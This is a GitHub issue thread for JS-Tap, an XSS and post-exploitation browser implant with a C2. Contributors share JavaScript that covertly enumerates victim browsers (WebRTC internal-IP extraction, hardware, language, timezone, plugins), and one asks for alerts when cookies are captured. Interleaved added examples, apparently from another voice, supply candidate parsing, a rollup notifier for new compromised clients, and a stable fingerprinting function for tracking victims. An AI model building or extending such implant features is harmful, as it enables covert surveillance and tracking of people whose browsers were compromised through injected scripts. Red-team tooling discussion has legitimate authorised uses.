hoodoer / JS-Tap

JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients, and a "mimic" feature that automatically generates custom payloads.
The Unlicense
327 stars, 33 forks

Add additional client enumeration features #6

Closed. hoodoer closed this issue 4 months ago.

hoodoer commented 6 months ago
Cool, you are very smart... Now, the WebRTC internal LAN IP trick cannot run in the Chrome browser, but some browsers, or Android browsers, can use WebRTC to detect the internal LAN IP; it is not suitable for all browsers.

But I can show you some other code.

// Get the user's internal (LAN) IP address
function getUserLocalIPAddress() {
    return new Promise((resolve, reject) => {
        window.RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
        if (!window.RTCPeerConnection) {
            reject("Your browser does not support RTCPeerConnection");
            return; // without this, the constructor below would throw
        }

        const pc = new RTCPeerConnection();
        pc.createDataChannel("");
        pc.createOffer()
            .then(offer => pc.setLocalDescription(offer))
            .catch(err => reject(err));

        pc.onicecandidate = event => {
            if (!event.candidate) {
                // Gathering finished without a usable candidate. Modern browsers
                // replace the host candidate's IP with an mDNS ".local" name.
                pc.onicecandidate = null;
                pc.close();
                reject("No IPv4 candidate found");
                return;
            }
            const ipRegex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
            const match = ipRegex.exec(event.candidate.candidate);
            if (!match) {
                return; // no dotted quad in this candidate; wait for the next one
            }
            resolve(match[1]);
            pc.onicecandidate = null;
            pc.close();
        };
    });
}

// Get the user's CPU, memory, color depth, language, browser language, time zone and browser plugin information
const clientInfo = {
    cpu: navigator.hardwareConcurrency,
    memory: navigator.deviceMemory,            // Chromium only; undefined elsewhere
    colorDepth: screen.colorDepth,
    language: navigator.language,
    browserLanguage: navigator.browserLanguage, // legacy IE property; undefined in modern browsers
    timeZone: Intl.DateTimeFormat().resolvedOptions().timeZone,
    plugins: Array.from(navigator.plugins).map(plugin => ({
        name: plugin.name,
        filename: plugin.filename
    }))
};

getUserLocalIPAddress()
    .then(ipAddress => {
        clientInfo.localIPAddress = ipAddress;
        console.log(clientInfo);
    })
    .catch(err => console.error(err));

Sometimes navigator.plugins can reveal software installed on the client (depending on the browser).

Anyway, this is a good project. Adding custom JavaScript functionality and passing information to JavaScript is a better extension that will make your project more popular.

Originally posted by @Burpbounty in https://github.com/hoodoer/JS-Tap/issues/4#issuecomment-1956609973
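
As an added example (not code from JS-Tap or from either poster in this thread), the following parses ICE candidate strings of the kind the `onicecandidate` handler in the quoted snippet receives, using constructed sample candidates rather than a real capture. It shows why the dotted-quad regex finds no LAN address on a current browser: the host candidate carries an mDNS `.local` name instead of the IPv4 address, and the only dotted quad left on the wire is the public server-reflexive address, which is not the internal IP the snippet is after.

```javascript
// Added example, not JS-Tap code: parse ICE candidate strings as the
// onicecandidate handler would see them, and compare with the regex grab.
//
// Candidate syntax (RFC 8839):
//   candidate:<foundation> <component> <transport> <priority> <address> <port> typ <type> ...
// Modern browsers replace the address of "host" candidates with an mDNS
// name (<uuid>.local), so the LAN IPv4 never reaches page JavaScript.

const CANDIDATE_RE = /^candidate:(\S+) (\d+) (\S+) (\d+) (\S+) (\d+) typ (\S+)/;
const IPV4_RE = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

function isIPv4(addr) {
  const m = IPV4_RE.exec(addr);
  return !!m && m.slice(1).every(o => Number(o) <= 255);
}

// RFC 1918 ranges only; labels what a "local" address would look like.
function isPrivateIPv4(addr) {
  if (!isIPv4(addr)) return false;
  const [a, b] = addr.split('.').map(Number);
  return a === 10 || (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168);
}

function parseIceCandidate(candidateStr) {
  const m = CANDIDATE_RE.exec(candidateStr);
  if (!m) return null;
  const address = m[5];
  return {
    foundation: m[1],
    component: Number(m[2]),
    transport: m[3].toLowerCase(),
    priority: Number(m[4]),
    address,
    port: Number(m[6]),
    type: m[7],                        // host | srflx | prflx | relay
    isMdns: /\.local$/i.test(address), // obfuscated host candidate
    isPrivate: isPrivateIPv4(address),
  };
}

// What the quoted snippet does: first dotted quad anywhere in the line, or null.
function legacyRegexGrab(candidateStr) {
  const m = /([0-9]{1,3}(\.[0-9]{1,3}){3})/.exec(candidateStr);
  return m ? m[1] : null;
}

// First IPv4 host candidate, or null when every host candidate is mDNS-obfuscated.
function extractLocalIPv4(candidateStrs) {
  for (const c of candidateStrs) {
    const p = parseIceCandidate(c);
    if (p && p.type === 'host' && !p.isMdns && isIPv4(p.address)) return p.address;
  }
  return null;
}

// Constructed sample candidates (not captured from a real session).
const LEGACY_HOST = 'candidate:842163049 1 udp 2122260223 192.168.1.42 53211 typ host generation 0 ufrag abcd network-id 1';
const MDNS_HOST   = 'candidate:842163049 1 udp 2122260223 2b9b1a9e-1f6c-4c6d-9d0a-5e0f1b2c3d4e.local 53211 typ host generation 0 ufrag abcd network-id 1';
const SRFLX       = 'candidate:1876313031 1 udp 1686052607 203.0.113.7 53211 typ srflx raddr 0.0.0.0 rport 0 generation 0 ufrag abcd network-id 1';

function demo() {
  return {
    oldBrowser: extractLocalIPv4([LEGACY_HOST, SRFLX]),  // '192.168.1.42'
    modernBrowser: extractLocalIPv4([MDNS_HOST, SRFLX]), // null
    regexOnMdns: legacyRegexGrab(MDNS_HOST),             // null, so [1] in the snippet would throw
    regexOnSrflx: legacyRegexGrab(SRFLX),                // '203.0.113.7' (public, not LAN)
  };
}
```

The practical consequence for an implant: on a current browser the only address a regex will ever pull out of a candidate is the server-reflexive (public) one, which is the same address the C2 already sees on the HTTP connection.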

Burpbounty commented 4 months ago

When you add the custom JS payload function, it is very easy to use. I often use it during red team penetration testing. Thank you for writing such a good tool, my friend. But I have some suggestions. If it is convenient for you, could you write a function to send logs to email or Telegram channels after receiving cookies and other information?

hoodoer commented 4 months ago

Thanks! I'm still planning on working on your enumeration suggestion, I have a ticket for it. Just been swamped with the auto payload generator, please give that a try sometime and let me know if you have issues.

I like the idea of email based notification, that shouldn't be too hard to pull off.

Besides configuring the tool to send emails, maybe a feature where you select which events you want to be notified for? Or a rollup of different events, if there has been new ones, over the past 24 hours?

Are you looking for immediate notifications, or occasional updates?

Burpbounty commented 4 months ago

If you have any questions about enumeration, you can contact me at any time; I will be very happy to communicate with you. In addition to sending emails, Telegram bot notifications.

On "you can choose which events to be notified of": I think "generate new events" is more valuable at this point in time, because when the red team simulates attack and defense, we have determined that we will do some operations through JS. At that time, timeliness is very important.

hoodoer commented 4 months ago

I'll see if I can add email notifications soon, I don't know anything about telegram though. I'll have to dig into that a bit.

hoodoer commented 4 months ago

@Burpbounty I just merged an SMTP email notification feature into main. Hopefully no bugs in here, I haven't seen any. You can get emails on new clients, or new clients and client events. There's a delay setting between emails so you don't get spammed to death. Hopefully that helps a bit. Let me know if you have any issues with it, all the SMTP settings are in "App Settings" in the app.
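
As an added example (not JS-Tap's implementation, whose SMTP code this thread does not show), the following models the notification behaviour described above: a subscription mode of either "new clients" or "new clients and client events", and a minimum delay between emails so a burst of events becomes one rollup message. The clock and the sender are injected hooks assumed for this example, so it runs offline; a deployment would pass the wall clock and an SMTP sender.

```javascript
// Added example, not JS-Tap's implementation: a notifier with the two
// subscription modes described in the thread and a cooldown between emails.
// `now` and `send` are assumed hooks so the walk-through runs without a mail server.

class RollupNotifier {
  constructor({ mode = 'clients', minDelayMs = 5 * 60 * 1000, now = () => Date.now(), send }) {
    if (mode !== 'clients' && mode !== 'clients+events') throw new Error(`unknown mode: ${mode}`);
    if (typeof send !== 'function') throw new Error('send hook required');
    this.mode = mode;
    this.minDelayMs = minDelayMs;
    this.now = now;
    this.send = send;
    this.pending = [];      // events not yet emailed
    this.lastSentAt = null; // time of the last email, null before the first
  }

  // Queue an event. Returns true if an email went out as a result.
  record(kind, detail) {
    if (kind !== 'new_client' && kind !== 'client_event') throw new Error(`unknown kind: ${kind}`);
    if (kind === 'client_event' && this.mode === 'clients') return false; // not subscribed
    this.pending.push({ kind, detail, at: this.now() });
    return this.flush();
  }

  // Send everything pending unless still inside the cooldown window.
  flush() {
    if (this.pending.length === 0) return false;
    const t = this.now();
    if (this.lastSentAt !== null && t - this.lastSentAt < this.minDelayMs) return false;
    const lines = this.pending.map(e => `[${new Date(e.at).toISOString()}] ${e.kind}: ${e.detail}`);
    this.send({
      subject: `JS-Tap: ${this.pending.length} new event(s)`,
      body: lines.join('\n'),
    });
    this.pending = [];
    this.lastSentAt = t;
    return true;
  }
}

// Constructed walk-through with a fake clock; returns what was "sent".
function demoNotifier(mode = 'clients') {
  let clock = 0;
  const sent = [];
  const n = new RollupNotifier({ mode, minDelayMs: 60000, now: () => clock, send: m => sent.push(m) });
  const r1 = n.record('new_client', 'client 1 from 198.51.100.5');   // first email goes out at once
  clock = 10000;
  const r2 = n.record('new_client', 'client 2 from 198.51.100.6');   // inside cooldown: queued
  const r3 = n.record('client_event', 'client 1 submitted a form'); // dropped or queued, per mode
  clock = 70000;
  const r4 = n.flush();                                             // cooldown over: rollup email
  return { results: [r1, r2, r3, r4], sent };
}
```

Events queued during the cooldown are only sent when something next calls `record` or `flush`; a real service would also call `flush` from a timer so a lone event does not sit in the queue until the next client checks in.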

hoodoer commented 4 months ago

@Burpbounty I have yet to see any local IP enumeration features work on any modern browser, I'm afraid this technique is no longer feasible. I have added the optional client fingerprinting in version 2.14. You need to enable it in the js-tap client, and also turn it on in the js-tap portal in app settings to show it.

The client search filter references the fingerprint value, so you can copy and paste it into the filter to show all clients with the same fingerprint. Hope that helps.
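
As an added example (not JS-Tap's fingerprinting code, which this thread does not show), the following builds a stable client fingerprint from the enumeration attributes quoted earlier in the thread. The point it demonstrates is the one a copy-paste search filter depends on: attributes are canonicalized (sorted object keys, plugins sorted by name, missing values normalized to null) so that the same client always produces the same value regardless of the order the browser hands things back. FNV-1a is an assumed choice that runs in both a browser and Node with no imports; it is an identifier, not a collision-resistant hash. The fake navigators are constructed, not real captures.

```javascript
// Added example, not JS-Tap's fingerprinting code: canonicalize the
// enumeration attributes and hash them into a stable identifier.

// Deterministic JSON: sorted keys, undefined treated as null.
function canonicalJson(v) {
  if (v === undefined || v === null) return 'null';
  if (typeof v !== 'object') return JSON.stringify(v);
  if (Array.isArray(v)) return '[' + v.map(canonicalJson).join(',') + ']';
  return '{' + Object.keys(v).sort()
    .map(k => JSON.stringify(k) + ':' + canonicalJson(v[k])).join(',') + '}';
}

// 32-bit FNV-1a (assumed choice): portable, no crypto import, not for security.
function fnv1a32(str) {
  let h = 0x811c9dc5;
  for (let i = 0; i < str.length; i++) {
    h ^= str.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h.toString(16).padStart(8, '0');
}

// nav/scr default to the browser globals; pass fakes to run outside a browser.
function collectClientInfo(nav = globalThis.navigator, scr = globalThis.screen) {
  const plugins = Array.from(nav.plugins || [])
    .map(p => ({ name: p.name, filename: p.filename }))
    .sort((a, b) => (a.name < b.name ? -1 : a.name > b.name ? 1 : 0));
  return {
    cpu: nav.hardwareConcurrency,
    memory: nav.deviceMemory,                  // undefined outside Chromium
    colorDepth: scr ? scr.colorDepth : undefined,
    language: nav.language,
    timeZone: Intl.DateTimeFormat().resolvedOptions().timeZone,
    plugins,
  };
}

function fingerprint(info) {
  return fnv1a32(canonicalJson(info));
}

// Constructed fake navigators: same client, attributes reported in a different order.
const FAKE_A = { hardwareConcurrency: 8, deviceMemory: 8, language: 'en-US',
  plugins: [{ name: 'PDF Viewer', filename: 'internal-pdf-viewer' },
            { name: 'Chrome PDF Viewer', filename: 'internal-pdf-viewer' }] };
const FAKE_B = { language: 'en-US', hardwareConcurrency: 8, deviceMemory: 8,
  plugins: [{ name: 'Chrome PDF Viewer', filename: 'internal-pdf-viewer' },
            { name: 'PDF Viewer', filename: 'internal-pdf-viewer' }] };
const FAKE_SCREEN = { colorDepth: 24 };
```

Keep the attribute set small and stable: anything that changes between page loads (viewport size, battery level, current URL) would split one client across several fingerprints and defeat the filter.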